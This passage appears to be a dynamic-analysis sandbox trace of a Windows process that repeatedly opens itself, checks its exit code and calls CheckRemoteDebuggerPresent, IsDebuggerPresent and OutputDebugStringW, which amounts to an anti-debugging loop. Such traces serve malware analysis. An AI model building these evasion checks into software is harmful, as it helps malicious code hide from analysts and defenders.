IsDebuggerPresent () returned 0 [0062.620] GetCurrentProcessId () returned 0xf64 [0062.620] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x228 [0062.621] GetExitCodeProcess (in: hProcess=0x228, lpExitCode=0x2896e0c | out: lpExitCode=0x2896e0c*=0x103) returned 1 [0062.621] CloseHandle (hObject=0x228) returned 1 [0062.621] OutputDebugStringW (lpOutputString="") [0067.133] GetCurrentProcessId () returned 0xf64 [0067.133] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x264 [0067.133] GetExitCodeProcess (in: hProcess=0x264, lpExitCode=0x28bdab4 | out: lpExitCode=0x28bdab4*=0x103) returned 1 [0067.133] CheckRemoteDebuggerPresent (in: hProcess=0x264, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0067.133] IsDebuggerPresent () returned 0 [0067.134] GetCurrentProcessId () returned 0xf64 [0067.134] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x268 [0067.134] GetExitCodeProcess (in: hProcess=0x268, lpExitCode=0x28bdb6c | out: lpExitCode=0x28bdb6c*=0x103) returned 1 [0067.134] CloseHandle (hObject=0x268) returned 1 [0067.134] OutputDebugStringW (lpOutputString="") [0069.999] GetCurrentProcessId () returned 0xf64 [0069.999] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x278 [0069.999] GetExitCodeProcess (in: hProcess=0x278, lpExitCode=0x28dc61c | out: lpExitCode=0x28dc61c*=0x103) returned 1 [0070.000] CheckRemoteDebuggerPresent (in: hProcess=0x278, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0070.000] IsDebuggerPresent () returned 0 [0070.000] GetCurrentProcessId () returned 0xf64 [0070.000] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x270 [0070.000] GetExitCodeProcess (in: hProcess=0x270, lpExitCode=0x28dc6d4 | out: lpExitCode=0x28dc6d4*=0x103) returned 1 [0070.000] CloseHandle (hObject=0x270) returned 1 [0070.000] OutputDebugStringW (lpOutputString="") [0071.024] GetCurrentProcessId () returned 0xf64 [0071.024] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x290 [0071.024] GetExitCodeProcess (in: hProcess=0x290, lpExitCode=0x28e1888 | out: lpExitCode=0x28e1888*=0x103) returned 1 [0071.024] CheckRemoteDebuggerPresent (in: hProcess=0x290, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0071.024] IsDebuggerPresent () returned 0 [0071.024] GetCurrentProcessId () returned 0xf64 [0071.025] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x294 [0071.025] GetExitCodeProcess (in: hProcess=0x294, lpExitCode=0x28e1940 | out: lpExitCode=0x28e1940*=0x103) returned 1 [0071.025] CloseHandle (hObject=0x294) returned 1 [0071.025] OutputDebugStringW (lpOutputString="") [0072.030] GetCurrentProcessId () returned 0xf64 [0072.030] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x2d4 [0072.030] GetExitCodeProcess (in: hProcess=0x2d4, lpExitCode=0x28f5f68 | out: lpExitCode=0x28f5f68*=0x103) returned 1 [0072.031] CheckRemoteDebuggerPresent (in: hProcess=0x2d4, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0072.031] IsDebuggerPresent () returned 0 [0072.031] GetCurrentProcessId () returned 0xf64 [0072.031] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x2dc [0072.031] GetExitCodeProcess (in: hProcess=0x2dc, lpExitCode=0x28f602c | out: lpExitCode=0x28f602c*=0x103) returned 1 [0072.031] CloseHandle (hObject=0x2dc) returned 1 [0072.031] OutputDebugStringW (lpOutputString="") [0073.040] GetCurrentProcessId () returned 0xf64 [0073.040] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x2e0 [0073.040] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x28f6254 | out: lpExitCode=0x28f6254*=0x103) returned 1 [0073.040] CheckRemoteDebuggerPresent (in: hProcess=0x2e0, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0073.040] IsDebuggerPresent () returned 0 [0073.041] GetCurrentProcessId () returned 0xf64 [0073.041] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x2e4 [0073.041] GetExitCodeProcess (in: hProcess=0x2e4, lpExitCode=0x28f630c | out: lpExitCode=0x28f630c*=0x103) returned 1 [0073.041] CloseHandle (hObject=0x2e4) returned 1 [0073.041] OutputDebugStringW (lpOutputString="") [0074.227] GetCurrentProcessId () returned 0xf64 [0074.228] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x2f0 [0074.228] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0x28f73cc | out: lpExitCode=0x28f73cc*=0x103) returned 1 [0074.228] CheckRemoteDebuggerPresent (in: hProcess=0x2f0, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0074.228] IsDebuggerPresent () returned 0 [0074.228] GetCurrentProcessId () returned 0xf64 [0074.228] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x2f4 [0074.228] GetExitCodeProcess (in: hProcess=0x2f4, lpExitCode=0x28f7484 | out: lpExitCode=0x28f7484*=0x103) returned 1 [0074.228] CloseHandle (hObject=0x2f4) returned 1 [0074.228] OutputDebugStringW (lpOutputString="") [0077.548] GetCurrentProcessId () returned 0xf64 [0077.549] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x2f4 [0077.549] GetExitCodeProcess (in: hProcess=0x2f4, lpExitCode=0x28fc870 | out: lpExitCode=0x28fc870*=0x103) returned 1 [0077.549] CheckRemoteDebuggerPresent (in: hProcess=0x2f4, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0077.549] IsDebuggerPresent () returned 0 [0077.549] GetCurrentProcessId () returned 0xf64 [0077.549] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x2f8 [0077.549] GetExitCodeProcess (in: hProcess=0x2f8, lpExitCode=0x28fc928 | out: lpExitCode=0x28fc928*=0x103) returned 1 [0077.550] CloseHandle (hObject=0x2f8) returned 1 [0077.550] OutputDebugStringW (lpOutputString="") [0078.812] GetCurrentProcessId () returned 0xf64 [0078.812] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x2f8 [0078.812] GetExitCodeProcess (in: hProcess=0x2f8, lpExitCode=0x28fc9e0 | out: lpExitCode=0x28fc9e0*=0x103) returned 1 [0078.813] CheckRemoteDebuggerPresent (in: hProcess=0x2f8, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0078.813] IsDebuggerPresent () returned 0 [0078.813] GetCurrentProcessId () returned 0xf64 [0078.813] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x2fc [0078.813] GetExitCodeProcess (in: hProcess=0x2fc, lpExitCode=0x28fca98 | out: lpExitCode=0x28fca98*=0x103) returned 1 [0078.813] CloseHandle (hObject=0x2fc) returned 1 [0078.813] OutputDebugStringW (lpOutputString="") [0079.828] GetCurrentProcessId () returned 0xf64 [0079.828] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x300 [0079.829] GetExitCodeProcess (in: hProcess=0x300, lpExitCode=0x28fccc0 | out: lpExitCode=0x28fccc0*=0x103) returned 1 [0079.829] CheckRemoteDebuggerPresent (in: hProcess=0x300, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0079.829] IsDebuggerPresent () returned 0 [0079.829] GetCurrentProcessId () returned 0xf64 [0079.829] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x304 [0079.829] GetExitCodeProcess (in: hProcess=0x304, lpExitCode=0x28fcd78 | out: lpExitCode=0x28fcd78*=0x103) returned 1 [0079.830] CloseHandle (hObject=0x304) returned 1 [0079.830] OutputDebugStringW (lpOutputString="") [0081.188] GetCurrentProcessId () returned 0xf64 [0081.188] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x308 [0081.188] GetExitCodeProcess (in: hProcess=0x308, lpExitCode=0x28fcfa0 | out: lpExitCode=0x28fcfa0*=0x103) returned 1 [0081.189] CheckRemoteDebuggerPresent (in: hProcess=0x308, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0081.189] IsDebuggerPresent () returned 0 [0081.189] GetCurrentProcessId () returned 0xf64 [0081.189] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x30c [0081.189] GetExitCodeProcess (in: hProcess=0x30c, lpExitCode=0x28fd058 | out: lpExitCode=0x28fd058*=0x103) returned 1 [0081.190] CloseHandle (hObject=0x30c) returned 1 [0081.190] OutputDebugStringW (lpOutputString="") [0082.619] GetCurrentProcessId () returned 0xf64 [0082.619] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x310 [0082.620] GetExitCodeProcess (in: hProcess=0x310, lpExitCode=0x28fd280 | out: lpExitCode=0x28fd280*=0x103) returned 1 [0082.620] CheckRemoteDebuggerPresent (in: hProcess=0x310, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0082.620] IsDebuggerPresent () returned 0 [0082.620] GetCurrentProcessId () returned 0xf64 [0082.620] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x314 [0082.620] GetExitCodeProcess (in: hProcess=0x314, lpExitCode=0x28fd338 | out: lpExitCode=0x28fd338*=0x103) returned 1 [0082.620] CloseHandle (hObject=0x314) returned 1 [0082.620] OutputDebugStringW (lpOutputString="") [0083.683] GetCurrentProcessId () returned 0xf64 [0083.684] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x318 [0083.684] GetExitCodeProcess (in: hProcess=0x318, lpExitCode=0x28fd560 | out: lpExitCode=0x28fd560*=0x103) returned 1 [0083.684] CheckRemoteDebuggerPresent (in: hProcess=0x318, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0083.684] IsDebuggerPresent () returned 0 [0083.684] GetCurrentProcessId () returned 0xf64 [0083.684] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x31c [0083.684] GetExitCodeProcess (in: hProcess=0x31c, lpExitCode=0x28fd618 | out: lpExitCode=0x28fd618*=0x103) returned 1 [0083.684] CloseHandle (hObject=0x31c) returned 1 [0083.685] OutputDebugStringW (lpOutputString="") [0084.710] GetCurrentProcessId () returned 0xf64 [0084.710] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x320 [0084.710] GetExitCodeProcess (in: hProcess=0x320, lpExitCode=0x28fd840 | out: lpExitCode=0x28fd840*=0x103) returned 1 [0084.710] CheckRemoteDebuggerPresent (in: hProcess=0x320, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0084.710] IsDebuggerPresent () returned 0 [0084.711] GetCurrentProcessId () returned 0xf64 [0084.711] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x324 [0084.711] GetExitCodeProcess (in: hProcess=0x324, lpExitCode=0x28fd8f8 | out: lpExitCode=0x28fd8f8*=0x103) returned 1 [0084.711] CloseHandle (hObject=0x324) returned 1 [0084.711] OutputDebugStringW (lpOutputString="") [0088.687] GetCurrentProcessId () returned 0xf64 [0088.687] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x328 [0088.687] GetExitCodeProcess (in: hProcess=0x328, lpExitCode=0x28fdb20 | out: lpExitCode=0x28fdb20*=0x103) returned 1 [0088.688] CheckRemoteDebuggerPresent (in: hProcess=0x328, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0088.688] IsDebuggerPresent () returned 0 [0088.688] GetCurrentProcessId () returned 0xf64 [0088.688] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x32c [0088.688] GetExitCodeProcess (in: hProcess=0x32c, lpExitCode=0x28fdbd8 | out: lpExitCode=0x28fdbd8*=0x103) returned 1 [0088.688] CloseHandle (hObject=0x32c) returned 1 [0088.689] OutputDebugStringW (lpOutputString="") [0089.714] GetCurrentProcessId () returned 0xf64 [0089.714] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x330 [0089.714] GetExitCodeProcess (in: hProcess=0x330, lpExitCode=0x28fde00 | out: lpExitCode=0x28fde00*=0x103) returned 1 [0089.715] CheckRemoteDebuggerPresent (in: hProcess=0x330, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0089.715] IsDebuggerPresent () returned 0 [0089.715] GetCurrentProcessId () returned 0xf64 [0089.715] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x334 [0089.715] GetExitCodeProcess (in: hProcess=0x334, lpExitCode=0x28fdeb8 | out: lpExitCode=0x28fdeb8*=0x103) returned 1 [0089.715] CloseHandle (hObject=0x334) returned 1 [0089.715] OutputDebugStringW (lpOutputString="") [0090.731] GetCurrentProcessId () returned 0xf64 [0090.731] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x338 [0090.731] GetExitCodeProcess (in: hProcess=0x338, lpExitCode=0x28fe0e0 | out: lpExitCode=0x28fe0e0*=0x103) returned 1 [0090.731] CheckRemoteDebuggerPresent (in: hProcess=0x338, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0090.732] IsDebuggerPresent () returned 0 [0090.732] GetCurrentProcessId () returned 0xf64 [0090.732] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x33c [0090.732] GetExitCodeProcess (in: hProcess=0x33c, lpExitCode=0x28fe198 | out: lpExitCode=0x28fe198*=0x103) returned 1 [0090.732] CloseHandle (hObject=0x33c) returned 1 [0090.762] OutputDebugStringW (lpOutputString="") [0091.776] GetCurrentProcessId () returned 0xf64 [0091.777] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x340 [0091.777] GetExitCodeProcess (in: hProcess=0x340, lpExitCode=0x28fe3c0 | out: lpExitCode=0x28fe3c0*=0x103) returned 1 [0091.777] CheckRemoteDebuggerPresent (in: hProcess=0x340, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0091.777] IsDebuggerPresent () returned 0 [0091.777] GetCurrentProcessId () returned 0xf64 [0091.778] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x344 [0091.778] GetExitCodeProcess (in: hProcess=0x344, lpExitCode=0x28fe478 | out: lpExitCode=0x28fe478*=0x103) returned 1 [0091.778] CloseHandle (hObject=0x344) returned 1 [0091.778] OutputDebugStringW (lpOutputString="") [0092.790] GetCurrentProcessId () returned 0xf64 [0092.790] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x348 [0092.790] GetExitCodeProcess (in: hProcess=0x348, lpExitCode=0x28fe6a0 | out: lpExitCode=0x28fe6a0*=0x103) returned 1 [0092.790] CheckRemoteDebuggerPresent (in: hProcess=0x348, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0092.790] IsDebuggerPresent () returned 0 [0092.790] GetCurrentProcessId () returned 0xf64 [0092.791] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x34c [0092.791] GetExitCodeProcess (in: hProcess=0x34c, lpExitCode=0x28fe758 | out: lpExitCode=0x28fe758*=0x103) returned 1 [0092.791] CloseHandle (hObject=0x34c) returned 1 [0092.791] OutputDebugStringW (lpOutputString="") [0093.819] GetCurrentProcessId () returned 0xf64 [0093.820] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x350 [0093.820] GetExitCodeProcess (in: hProcess=0x350, lpExitCode=0x28fe98c | out: lpExitCode=0x28fe98c*=0x103) returned 1 [0093.820] CheckRemoteDebuggerPresent (in: hProcess=0x350, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0093.820] IsDebuggerPresent () returned 0 [0093.820] GetCurrentProcessId () returned 0xf64 [0093.820] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x354 [0093.821] GetExitCodeProcess (in: hProcess=0x354, lpExitCode=0x28fea44 | out: lpExitCode=0x28fea44*=0x103) returned 1 [0093.821] CloseHandle (hObject=0x354) returned 1 [0093.821] OutputDebugStringW (lpOutputString="") [0094.833] GetCurrentProcessId () returned 0xf64 [0094.833] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x358 [0094.833] GetExitCodeProcess (in: hProcess=0x358, lpExitCode=0x28fec6c | out: lpExitCode=0x28fec6c*=0x103) returned 1 [0094.833] CheckRemoteDebuggerPresent (in: hProcess=0x358, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0094.834] IsDebuggerPresent () returned 0 [0094.834] GetCurrentProcessId () returned 0xf64 [0094.834] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x35c [0094.834] GetExitCodeProcess (in: hProcess=0x35c, lpExitCode=0x28fed24 | out: lpExitCode=0x28fed24*=0x103) returned 1 [0094.834] CloseHandle (hObject=0x35c) returned 1 [0094.834] OutputDebugStringW (lpOutputString="") [0095.847] GetCurrentProcessId () returned 0xf64 [0095.847] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x360 [0095.847] GetExitCodeProcess (in: hProcess=0x360, lpExitCode=0x28fef4c | out: lpExitCode=0x28fef4c*=0x103) returned 1 [0095.847] CheckRemoteDebuggerPresent (in: hProcess=0x360, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0095.847] IsDebuggerPresent () returned 0 [0095.847] GetCurrentProcessId () returned 0xf64 [0095.848] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x364 [0095.848] GetExitCodeProcess (in: hProcess=0x364, lpExitCode=0x28ff004 | out: lpExitCode=0x28ff004*=0x103) returned 1 [0095.848] CloseHandle (hObject=0x364) returned 1 [0095.848] OutputDebugStringW (lpOutputString="") [0096.861] GetCurrentProcessId () returned 0xf64 [0096.862] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x368 [0096.862] GetExitCodeProcess (in: hProcess=0x368, lpExitCode=0x28ff22c | out: lpExitCode=0x28ff22c*=0x103) returned 1 [0096.862] CheckRemoteDebuggerPresent (in: hProcess=0x368, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0096.862] IsDebuggerPresent () returned 0 [0096.862] GetCurrentProcessId () returned 0xf64 [0096.863] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x36c [0096.863] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0x28ff2e4 | out: lpExitCode=0x28ff2e4*=0x103) returned 1 [0096.863] CloseHandle (hObject=0x36c) returned 1 [0096.863] OutputDebugStringW (lpOutputString="") [0097.875] GetCurrentProcessId () returned 0xf64 [0097.875] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x370 [0097.875] GetExitCodeProcess (in: hProcess=0x370, lpExitCode=0x28ff50c | out: lpExitCode=0x28ff50c*=0x103) returned 1 [0097.875] CheckRemoteDebuggerPresent (in: hProcess=0x370, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0097.875] IsDebuggerPresent () returned 0 [0097.875] GetCurrentProcessId () returned 0xf64 [0097.876] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x374 [0097.876] GetExitCodeProcess (in: hProcess=0x374, lpExitCode=0x28ff5c4 | out: lpExitCode=0x28ff5c4*=0x103) returned 1 [0097.876] CloseHandle (hObject=0x374) returned 1 [0097.876] OutputDebugStringW (lpOutputString="") [0098.889] GetCurrentProcessId () returned 0xf64 [0098.889] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x378 [0098.889] GetExitCodeProcess (in: hProcess=0x378, lpExitCode=0x28ff7ec | out: lpExitCode=0x28ff7ec*=0x103) returned 1 [0098.890] CheckRemoteDebuggerPresent (in: hProcess=0x378, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0098.890] IsDebuggerPresent () returned 0 [0098.890] GetCurrentProcessId () returned 0xf64 [0098.890] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x37c [0098.890] GetExitCodeProcess (in: hProcess=0x37c, lpExitCode=0x28ff8a4 | out: lpExitCode=0x28ff8a4*=0x103) returned 1 [0098.891] CloseHandle (hObject=0x37c) returned 1 [0098.891] OutputDebugStringW (lpOutputString="") [0099.919] GetCurrentProcessId () returned 0xf64 [0099.919] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x388 [0099.919] GetExitCodeProcess (in: hProcess=0x388, lpExitCode=0x28ffacc | out: lpExitCode=0x28ffacc*=0x103) returned 1 [0099.919] CheckRemoteDebuggerPresent (in: hProcess=0x388, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0099.919] IsDebuggerPresent () returned 0 [0099.919] GetCurrentProcessId () returned 0xf64 [0099.920] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x38c [0099.920] GetExitCodeProcess (in: hProcess=0x38c, lpExitCode=0x28ffb84 | out: lpExitCode=0x28ffb84*=0x103) returned 1 [0099.920] CloseHandle (hObject=0x38c) returned 1 [0099.920] OutputDebugStringW (lpOutputString="") [0100.933] GetCurrentProcessId () returned 0xf64 [0100.933] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x390 [0100.933] GetExitCodeProcess (in: hProcess=0x390, lpExitCode=0x28ffdac | out: lpExitCode=0x28ffdac*=0x103) returned 1 [0100.934] CheckRemoteDebuggerPresent (in: hProcess=0x390, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0100.934] IsDebuggerPresent () returned 0 [0100.934] GetCurrentProcessId () returned 0xf64 [0100.935] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x394 [0100.935] GetExitCodeProcess (in: hProcess=0x394, lpExitCode=0x28ffe64 | out: lpExitCode=0x28ffe64*=0x103) returned 1 [0100.935] CloseHandle (hObject=0x394) returned 1 [0100.935] OutputDebugStringW (lpOutputString="") [0101.949] GetCurrentProcessId () returned 0xf64 [0101.949] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x398 [0101.949] GetExitCodeProcess (in: hProcess=0x398, lpExitCode=0x290008c | out: lpExitCode=0x290008c*=0x103) returned 1 [0101.950] CheckRemoteDebuggerPresent (in: hProcess=0x398, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0101.950] IsDebuggerPresent () returned 0 [0101.950] GetCurrentProcessId () returned 0xf64 [0101.951] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x39c [0101.951] GetExitCodeProcess (in: hProcess=0x39c, lpExitCode=0x2900144 | out: lpExitCode=0x2900144*=0x103) returned 1 [0101.951] CloseHandle (hObject=0x39c) returned 1 [0101.951] OutputDebugStringW (lpOutputString="") [0103.023] GetCurrentProcessId () returned 0xf64 [0103.023] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3a0 [0103.023] GetExitCodeProcess (in: hProcess=0x3a0, lpExitCode=0x290036c | out: lpExitCode=0x290036c*=0x103) returned 1 [0103.023] CheckRemoteDebuggerPresent (in: hProcess=0x3a0, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0103.023] IsDebuggerPresent () returned 0 [0103.024] GetCurrentProcessId () returned 0xf64 [0103.024] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3a4 [0103.024] GetExitCodeProcess (in: hProcess=0x3a4, lpExitCode=0x2900424 | out: lpExitCode=0x2900424*=0x103) returned 1 [0103.024] CloseHandle (hObject=0x3a4) returned 1 [0103.024] OutputDebugStringW (lpOutputString="") [0104.053] GetCurrentProcessId () returned 0xf64 [0104.053] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3a8 [0104.053] GetExitCodeProcess (in: hProcess=0x3a8, lpExitCode=0x290064c | out: lpExitCode=0x290064c*=0x103) returned 1 [0104.053] CheckRemoteDebuggerPresent (in: hProcess=0x3a8, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0104.053] IsDebuggerPresent () returned 0 [0104.053] GetCurrentProcessId () returned 0xf64 [0104.054] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3ac [0104.054] GetExitCodeProcess (in: hProcess=0x3ac, lpExitCode=0x2900704 | out: lpExitCode=0x2900704*=0x103) returned 1 [0104.054] CloseHandle (hObject=0x3ac) returned 1 [0104.054] OutputDebugStringW (lpOutputString="") [0105.224] GetCurrentProcessId () returned 0xf64 [0105.224] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3b0 [0105.224] GetExitCodeProcess (in: hProcess=0x3b0, lpExitCode=0x2900938 | out: lpExitCode=0x2900938*=0x103) returned 1 [0105.224] CheckRemoteDebuggerPresent (in: hProcess=0x3b0, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0105.225] IsDebuggerPresent () returned 0 [0105.225] GetCurrentProcessId () returned 0xf64 [0105.225] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3b4 [0105.225] GetExitCodeProcess (in: hProcess=0x3b4, lpExitCode=0x29009f0 | out: lpExitCode=0x29009f0*=0x103) returned 1 [0105.225] CloseHandle (hObject=0x3b4) returned 1 [0105.225] OutputDebugStringW (lpOutputString="") [0106.237] GetCurrentProcessId () returned 0xf64 [0106.237] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3b8 [0106.237] GetExitCodeProcess (in: hProcess=0x3b8, lpExitCode=0x2900c18 | out: lpExitCode=0x2900c18*=0x103) returned 1 [0106.238] CheckRemoteDebuggerPresent (in: hProcess=0x3b8, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0106.238] IsDebuggerPresent () returned 0 [0106.238] GetCurrentProcessId () returned 0xf64 [0106.238] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3bc [0106.238] GetExitCodeProcess (in: hProcess=0x3bc, lpExitCode=0x2900cd0 | out: lpExitCode=0x2900cd0*=0x103) returned 1 [0106.238] CloseHandle (hObject=0x3bc) returned 1 [0106.239] OutputDebugStringW (lpOutputString="") [0107.252] GetCurrentProcessId () returned 0xf64 [0107.252] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3c0 [0107.252] GetExitCodeProcess (in: hProcess=0x3c0, lpExitCode=0x2900ef8 | out: lpExitCode=0x2900ef8*=0x103) returned 1 [0107.252] CheckRemoteDebuggerPresent (in: hProcess=0x3c0, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0107.252] IsDebuggerPresent () returned 0 [0107.252] GetCurrentProcessId () returned 0xf64 [0107.252] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3c4 [0107.253] GetExitCodeProcess (in: hProcess=0x3c4, lpExitCode=0x2900fb0 | out: lpExitCode=0x2900fb0*=0x103) returned 1 [0107.253] CloseHandle (hObject=0x3c4) returned 1 [0107.253] OutputDebugStringW (lpOutputString="") [0108.265] GetCurrentProcessId () 